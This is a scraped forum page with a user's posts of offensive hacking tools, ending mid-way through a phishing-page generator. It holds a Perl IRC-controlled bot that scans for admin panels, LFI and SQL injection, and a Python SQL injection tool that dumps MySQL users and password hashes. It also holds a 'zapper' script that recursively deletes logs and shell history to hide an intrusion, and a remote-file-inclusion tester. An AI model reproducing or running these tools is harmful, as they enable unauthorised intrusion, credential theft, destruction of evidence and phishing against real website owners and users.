hp','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.ph
p','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admi
n4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");


print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1"; # IRC server
my $canal = "#locos"; # IRC channel on the specified server
my $nick = "Lepuke-Slave"; # Bot nickname
my $port = "6667"; # IRC server port

print "[+] Starting the bot\n";

my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );

if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}


print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

print "[+] Online\n\n";

while ( my $log = <$soquete> ) {
chomp($log);

if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}

if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}

if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}



if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}

if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}

if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}

sub lfi {
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}


sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}

sub scan {
print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) {
print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
}
}



sub scan2 {

my $rows  = "0";
my $asc;
my $page = $_[0];

($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
}

sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}


sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub toma {
return $nave->request (GET $_[0])->content;
}

sub tomax {
return $nave->request (GET $_[0]);
}

#The End





#392
Scripting / [Python] SQL Scanner 0.3
7 Octubre 2011, 01:40 AM
Well, this is a simple scanner in Python that I made for SQLi

With the following options:

  • Checks for the vulnerability
  • Finds the columns
  • Finds the magic number and pulls info about the DB
  • Pulls tables and columns from the current DB or from another, external one
  • Dumps users
  • Saves everything to a log named after the website in the /logs folder


    Código (python) [Seleccionar]

    #!usr/bin/python
    #SQL Scanner 0.3 (C) Doddy Hackman 2010

    import os,sys,urllib2,re,binascii
    from urlparse import urlparse

    def clean():
    if sys.platform=="win32":
     os.system("cls")
    else:
     os.system("clear")

    def savefile(name,text):
    file = open(name,"a")
    file.write("\n"+text+"\n")
    file.close()

    def gethost(test):
    return urlparse(test).netloc

    def header() :
    print "\n--== SQL Scanner ==--\n"

    def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

    def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def bypass(bypass):
    if bypass == "--":
     return("+","--")
    elif bypass == "/*":
     return("/**/","/*")
    else:
     return("+","--")


    def dumper(web,passx,table,col1,col2):

    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    print "\n\n[+] Searching values\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] Values Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       c1 = re.findall("K0BRA(.*?)K0BRA",code2)
       c1 = c1[0]

       c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
       c2 = c2[0]
       print "["+col1+"] : "+c1
       print "["+col2+"] : "+c2+"\n"
       savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
       savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
    else:
     print "[-] Not Found\n"



    def mysqluser(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    print "\n\n[+] Searching mysql.user\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] mysql.user : ON"
     savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
     savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
     print "[+] Users Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       host = re.findall("K0BRA(.*?)K0BRA",code2)
       host = host[0]

       user = re.findall("K0BRA1(.*?)K0BRA1",code2)
       user = user[0]

       passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
       passw = passw[0]
       savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
       savefile("logs/"+gethost(web)+".txt","[User] : "+user)
       savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
       print "[Host] : "+host
       print "[User] : "+user
       print "[Pass] : "+passw+"\n"    
    else:
     print "[-] Not Found\n"



    def showcolumnsdb(web,db,table,passx):
    db = "0x"+str(binascii.hexlify(db))
    table = "0x"+str(binascii.hexlify(table))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching columns in DB\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
     savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
     print "[+] information_schema : ON"
     print "[+] Columns Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
       print "[Column Found] : "+column

    else:
     print "[-] Not Found\n"


    def showtablesdb(web,db,passx):
    db = "0x"+str(binascii.hexlify(db))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching tables in DB\n\n"
    savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Tables Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
     
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       print "[Table Found] : "+table
       savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
     print "[-] Not Found\n"



    def showtables(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    print "\n\n[+] Searching tables\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Tables Found : ",numbers,"\n"
     for counter in range(17,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       print "[Table Found] : "+table
       savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
     print "[-] Not Found\n"



    def showcolumns(tabla,web,passx):
    pass1,pass2 = bypass(passx)
    tabla = "0x"+str(binascii.hexlify(tabla))
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
    print "\n\n[+] Searching tables\n\n"
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Columns Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       print "[Column Found] : "+column
       savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    else:
     print "[-] Not Found\n"




    def showdbs(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    print "\n\n[+] Searching DBS\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] DBS Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       db = re.findall("K0BRA(.*?)K0BRA",code2)
       db = db[0]
       print "[DB Found] : "+db
       savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
    else:
     print "[-] Not Found\n"




    def menu(page,bypass):
    clean()
    header()
    print "\n[+] Target : ",page,"\n"
    print "\n[information_schema]\n\n"
    print "1 - Show tables\n"
    print "2 - Show columns of the a table\n"
    print "3 - Show databases\n"
    print "4 - Show tables from the a DB\n"
    print "5 - Show columns from the a table of the DB\n"
    print "\n[mysql.user]\n\n"
    print "6 - Show users\n"
    print "\n[Others]\n\n"
    print "7 - Show details\n"
    print "8 - Dump data\n"
    print "9 - Show log\n"
    print "10 - Change target\n"
    print "11 - Exit\n\n"
    try:
     op = input("[Option] : ")
     if op == 1:
      showtables(page,bypass)
      raw_input()    
      menu(page,bypass)
     elif op == 2:
      table = raw_input("\n\n[Table] : ")
      showcolumns(table,page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 3:
      showdbs(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 4:
      db = raw_input("\n\n[DB] : ")
      showtablesdb(page,db,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 5:
      db = raw_input("\n\n[DB] : ")
      table = raw_input("\n\n[Table] : ")
      showcolumnsdb(page,db,table,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 6:
      mysqluser(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 7:
      more(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 8:
      table = raw_input("\n\n[Table] : ")
      col1 = raw_input("\n\n[Column 1] : ")
      col2 = raw_input("\n\n[Column 2] : ")
      dumper(page,bypass,table,col1,col2)
      raw_input()
      menu(page,bypass)
     elif op == 9:
      os.system("start logs/"+gethost(page)+".txt")
      menu(page,bypass)
     elif op == 10:
      sta()
    except:
     menu(page,bypass)
    if op == 11:
     copyright()
     

    def more(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
    code0 = toma(web1+pass2)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
     datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
     datar = re.split("K0BRA",datax[0])
     print "[+] Username :",datar[1]
     print "[+] Database :",datar[2]
     print "[+] Version :",datar[3],"\n"
     savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
     savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
     savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
      print "[+] mysql.user : on"
      savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
      print "[+] information_schema.tables : on"
      savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

    def findlength(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
    for te in range(2,30):
     number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
     code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
     if (re.findall("K0BRA(.*?)K0BRA",code)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code)
      print "[+] Column length :",te
      print "[+] Numbers",numbers,"print data"
      sql = ""
      tex = te + 1
      for sqlix in range(2,tex):
       sql = str(sql)+","+str(sqlix)
       sqli  = str(1)+sql
      sqla = re.sub(numbers[0],"hackman",sqli)
      savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
      menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

    print "[-] Length dont found\n"
     
       
    def scan(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n\n[+] Testing vulnerability"
    code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     print "[+] SQLI Detected"
     findlength(web,passx)
    else:
     print "[-] Not Vulnerable"
     copyright()


    def sta():

    clean()
    header()

    web = raw_input("\n\n[Page] : ")
    bypasx = raw_input("\n\n[Bypass] : ")
    scan(web,bypasx)

    sta()

    #The End

#393
Scripting / [Python] Zapper By Doddy H
7 Octubre 2011, 01:39 AM
Hello everyone.

I just made a simple zapper in Python; you just load it on the attacked web system and it starts
wiping traces.
Mind you, I hadn't realised how easy Python is to use xDD

Código (python) [Seleccionar]

#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
try :
 os.delete(path)
except :
 pass

for cmd in comandos :
try:
 os.system(cmd)
except:
 pass

print "[+] All logs are erased\n"

#The End ?

#394
Scripting / [Python] RFI Tester
7 Octubre 2011, 01:39 AM
Hello everyone.

I just made a simple RFI vulnerability checker

Código (python) [Seleccionar]

#!usr/bin/python
#RFI Tester (C) Doddy Hackman

import os,sys,urllib2,re

def header() :
print "\n--== RFI Tester ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()

def test(web):
try:
 print "\n[+] Testing vulnerability RFI in",web
 code = toma(web+"http://www.supertangas.com")
 if(re.findall("Los mejores TANGAS de la red",code,re.I)):
  print "[+] RFI Detected"
 else:
  print "[-] RFI Not Found"
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
test(sys.argv[1])

copyright()


#The End


Usage example


python rfi.py http://127.0.0.1/rfi.php?index=



C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

#395
Scripting / [Python] Phising Gen By Doddy H
7 Octubre 2011, 01:39 AM
Hello everyone

I just finished this tool in Python to generate fakes or phishing pages (if that's how it's spelled).
I don't do much of that side of hacking, but I made this odd thing because I had
nothing to do xDD.


Código (python) [Seleccionar]
#!usr/bin/python
#Phising Gen (C) Doddy Hackman

import urllib2,sys,os


def savefile(filename,text):
file = open(filename,"w")
file.write(text)
   

def header() :
print "\n\n--== Phising Gen ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def gen(web,new):
try:
 print "\n[+] Working in the phishing"
 code = toma(web)
